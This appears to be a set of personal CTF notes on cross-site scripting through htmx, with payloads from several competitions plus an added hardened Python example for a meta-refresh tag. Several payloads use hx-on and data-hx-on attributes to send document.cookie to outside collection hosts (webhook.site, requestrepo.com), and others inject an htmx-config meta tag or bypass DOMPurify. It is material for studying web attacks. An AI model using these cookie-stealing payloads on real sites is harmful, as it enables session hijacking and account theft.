HTMX

![[Pasted image 20230620190834.png]]

gpn ctf 2023

https://htmx.org/attributes/hx-disable/#:~:text=The%20hx%2Ddisable%20attribute%20will,to%20prevent%20malicious%20scripting%20attacks

<meta name="htmx-config" content='{"disableSelector":"[lol-no]"}'>

XSS in htmx

Awesomenotes I (flux ctf 2023)

    <div hx-get="/testing"
         hx-on="htmx:beforeRequest: fetch('https://webhook.site/c70fb7e3-bcf3-400d-abbf-f094982542c0?'+document.cookie)"
         hx-trigger="load delay:0.001s"
         hx-target="find div">
      <div></div>
    </div>

    <div hx-get="/lol"
         hx-on="htmx:beforeRequest: alert(1)"
         hx-trigger="load"
         hx-target="find div">
      <div></div>
    </div>

    <h1 hx-get="/"
        hx-on::config-request="fetch(`{poll_server}/notify?token={token}&cookie=${{document.cookie}}`); event.preventDefault()"
        hx-trigger="htmx:after-process-node delay:0.001s"
        hx-target="this">test</h1>

XSS via htmx config when input lands inside a meta tag

ctf/2024/linectf/web-auth-internal at master · theori-io/ctf (github.com)

http://35.200.122.11:20000/login?timeout={%22indicatorClass%22:%22%3C/style%3E%3Cimg%20src=1%20onerror=alert(1)%3E%3Cstyle%3Ess%22}%27%20x=%27&return_url=invalidscheme://11%27%20content=%27hehehe%27%20http-equiv=%27asdf%27%20name=%27htmx-config

    # Both values come from the query string and are interpolated into
    # single-quoted attributes of the <meta> tag built below.
    return_url = escape(request.args.get("return_url", "/login"))
    timeout = escape(request.args.get("timeout", "3"))
    session.pop("access_token", None)
    return render_template(
        "redirect.html",
        msg=f"<meta http-equiv='refresh' content='{timeout};url={return_url}'>redirect to page in {timeout} seconds...",
    )

equivalent to

<meta http-equiv="refresh" content="{&quot;indicatorClass&quot;:&quot;</style><img src=1 onerror=alert(1)><style>ss&quot;}" x=";url=invalidscheme://11" name="htmx-config">
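
A hardened way to build the same refresh tag, as an added example that is not code from the challenge or from this note: both inputs are validated against what they are supposed to be (a small integer and a same-site path) instead of only being escaped, and the attributes are double-quoted and escaped with quote handling on. The function names, the 60-second cap and the fallback values are assumptions for illustration.

```python
import html
from urllib.parse import unquote

DEFAULT_TIMEOUT = 3
DEFAULT_RETURN_URL = "/login"

# The two query values from the URL quoted above, percent-decoded.
PAGE_TIMEOUT = unquote(
    "{%22indicatorClass%22:%22%3C/style%3E%3Cimg%20src=1%20onerror=alert(1)"
    "%3E%3Cstyle%3Ess%22}%27%20x=%27")
PAGE_RETURN_URL = unquote(
    "invalidscheme://11%27%20content=%27hehehe%27%20http-equiv=%27asdf%27"
    "%20name=%27htmx-config")


def safe_timeout(raw, maximum=60):
    """Accept only a short ASCII-digit string that fits the allowed range."""
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 4):
        return DEFAULT_TIMEOUT
    value = int(raw)
    return value if value <= maximum else DEFAULT_TIMEOUT


def safe_return_url(raw):
    """Accept only a same-site absolute path, e.g. /login?next=1."""
    if not raw.startswith("/") or raw.startswith("//"):
        return DEFAULT_RETURN_URL
    # Browsers normalise "\" to "/", so "/\host" behaves like "//host".
    # Quotes, angle brackets, spaces and control characters are refused too.
    if any(c in "\\'\"<>" or ord(c) < 0x21 for c in raw):
        return DEFAULT_RETURN_URL
    return raw


def build_refresh_meta(timeout_raw, return_url_raw):
    """Return the <meta refresh> tag with validated, escaped values."""
    timeout = safe_timeout(timeout_raw)
    return_url = safe_return_url(return_url_raw)
    content = html.escape(f"{timeout};url={return_url}", quote=True)
    return f'<meta http-equiv="refresh" content="{content}">'


if __name__ == "__main__":
    print(build_refresh_meta("5", "/home"))
    print(build_refresh_meta(PAGE_TIMEOUT, PAGE_RETURN_URL))
```

With the values from the URL above, both inputs fail validation and the tag falls back to the defaults, so no extra attributes such as `name` reach the page.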

HTMX Bypass Filter DOMPurify and Redirect

midnight-sub-ctf-2024/web/modern

If the HTML is generated dynamically:

<div hx-get="/{file}">

If the URL redirects when using "/", we can take the following approach:

http://modern-1.play.hfsc.tf:8000/share/%5Cexample.com

we oob swap for modern, instead of hx header

<div data-nice data-hx-swap-oob="beforeend:html">
  <div data-hx-on::load="fetch('//server?'+document.cookie)">
</div>

I think ours was slightly unintended then.

Headers:

HX-Retarget: div.flex
Access-Control-Expose-Headers: HX-Retarget
Access-Control-Allow-Headers: hx-current-url,hx-request,hx-target
Access-Control-Allow-Methods: GET
Access-Control-Allow-Origin: *

Body:

<img data-hx-on:error="window.location.href = 'https://dy77uso9.requestrepo.com/?' + document.cookie" src="https://dy77uso9.requestrepo.com/test">adasdsadsadas</img>

HX- Alternative

Something like data-hx-on will bypass DOMPurify.

For this kind of challenge I usually look into the source code (which wasn't too big), and I quickly noticed that data-hx is supported: https://unpkg.com/htmx.org@1.9.11/dist/htmx.js
